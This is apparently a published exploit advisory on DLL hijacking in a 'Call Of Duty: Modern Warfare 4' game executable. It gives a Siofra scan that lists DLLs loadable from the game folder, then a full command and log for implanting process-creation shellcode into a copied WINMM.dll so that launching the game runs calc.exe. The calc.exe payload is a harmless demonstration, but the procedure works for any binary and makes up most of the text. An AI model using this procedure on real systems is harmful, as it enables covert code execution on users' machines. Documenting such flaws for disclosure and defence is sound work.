+---------------------------------------------------------------------------------
| # Title : Call Of Duty : Modern Warfare 4 DLL Hijacking
| # Author : Febriyanto Nugroho (vmvm1071@gmail.com)
| # Tested on : Windows 7 Ultimate 64-bit (6.1, build 7601)
| # Vendor Link : https://www.activision.com/
+---------------------------------------------------------------------------------
1. Description
===============
I found a bug that could allow piracy of DLL files in the game
Call Of Duty : Modern Warfare 4, the attacker can inject by inserting a payload
against DLL files that have vulnerabilities.
C:\siofra>Siofra32.exe --mode file-scan -f "D:\MW4\iw3sp.exe" --enum-dependency --dll-hijack
[*] Siofra version 1.13 has entered architecture mode Wow64
======== D:\MW4\iw3sp.exe [32-bit PE] ========
iw3sp.exe
WINMM.dll [!]
msvcrt.dll [KnownDLL]
API-MS-Win-Core-ErrorHandling-L1-1-0.dll [API set]
kernel32.dll [KnownDLL]
USER32.dll [KnownDLL]
GDI32.dll [KnownDLL]
LPK.dll [KnownDLL]
USP10.dll [KnownDLL]
ADVAPI32.dll [KnownDLL]
RPCRT4.dll [KnownDLL]
SspiCli.dll [Base]
CRYPTBASE.dll [Base]
mss32.dll [!]
binkw32.dll [!]
d3d9.dll [!]
VERSION.dll [!]
d3d8thk.dll [!]
dwmapi.dll [!]
d3dx9_34.dll [!]
SHELL32.dll [KnownDLL]
SHLWAPI.dll [KnownDLL]
DDRAW.dll [!]
DCIMAN32.dll [!]
SETUPAPI.dll [KnownDLL]
CFGMGR32.dll [Base]
OLEAUT32.dll [KnownDLL]
ole32.dll [KnownDLL]
DEVOBJ.dll [Base]
[!] Module WINMM.dll vulnerable at D:\MW4\WINMM.dll (real path: C:\Windows\SysWOW64\WINMM.dll)
[!] Module d3d9.dll vulnerable at D:\MW4\d3d9.dll (real path: C:\Windows\SysWOW64\d3d9.dll)
[!] Module VERSION.dll vulnerable at D:\MW4\VERSION.dll (real path: C:\Windows\SysWOW64\VERSION.dll)
[!] Module d3d8thk.dll vulnerable at D:\MW4\d3d8thk.dll (real path: C:\Windows\SysWOW64\d3d8thk.dll)
[!] Module dwmapi.dll vulnerable at D:\MW4\dwmapi.dll (real path: C:\Windows\SysWOW64\dwmapi.dll)
[!] Module d3dx9_34.dll vulnerable at D:\MW4\d3dx9_34.dll (real path: C:\Windows\SysWOW64\d3dx9_34.dll)
[!] Module DDRAW.dll vulnerable at D:\MW4\DDRAW.dll (real path: C:\Windows\SysWOW64\DDRAW.dll)
[!] Module DCIMAN32.dll vulnerable at D:\MW4\DCIMAN32.dll (real path: C:\Windows\SysWOW64\DCIMAN32.dll)
C:\siofra>
The scan results above for the Call Of Duty: Modern Warfare 4 game application, there are several DLL files
have vulnerability.
2. Exploiting
===============
Exploitation can be done by saving the DLL file in the Call Of Duty: Modern Warfare 4 game folder,
by copying the DLL file, rename the DLL file to <file_DLL_original.dll>
<vuln_DLL.dll>.
D:\>cd D:\MW4
D:\MW4>C:\siofra\Siofra32.exe --mode infect -f WINMM_original.dll -o WINMM.dll --payload-type process --payload-path C:\Windows\System32\calc.exe
[*] Siofra version 1.13 has entered architecture mode Wow64
[*] Infection mode selected (verbosity level 1).
[*] Successfully read target file WINMM_original.dll (194048 bytes) to memory
[*] Selected process creation shellcode (1177 bytes) for implant
[*] Allocated 1235 bytes for custom shellcode (including path C:\Windows\System32\calc.exe)
[*] Successfully validated chosen PE with entry point 0x000037f1
[*] Entry point at 0x000037f1 tied to section ".text". Checking for relocs overlapping with detour of size 10 to be written to this address
[*] The desired PE contains a valid reloc section at 0x0002f000.
[*] This file has relocations but they do not interfere with the desired detour at 0x000037f1 (10 bytes)
[*] New PE created
File size: 194048 -> 195584 bytes
Detour information
Size: 10
RVA: 0x000037f1
Destination: 0x00031400
Checksum: 0x00035432 -> 0x00034915
Image size: 0x00032000 -> 0x00032000
Implanted section
Name: .reloc (index 3)
RVA: 0x0002f000
Virtual size: 8804 -> 10451 bytes
Raw size: 9216 -> 10752 bytes
Payload address: 0x00031400
Payload size: 1247
[+] Successfully completed appender infection on WINMM_original.dll
[+] Wrote new PE to output file WINMM.dll
D:\MW4>
4. Result
==========
The results after the payload injection of the Call Of Duty: Modern Warfare 4 game file, when run
then the game will do spawning calc.exe
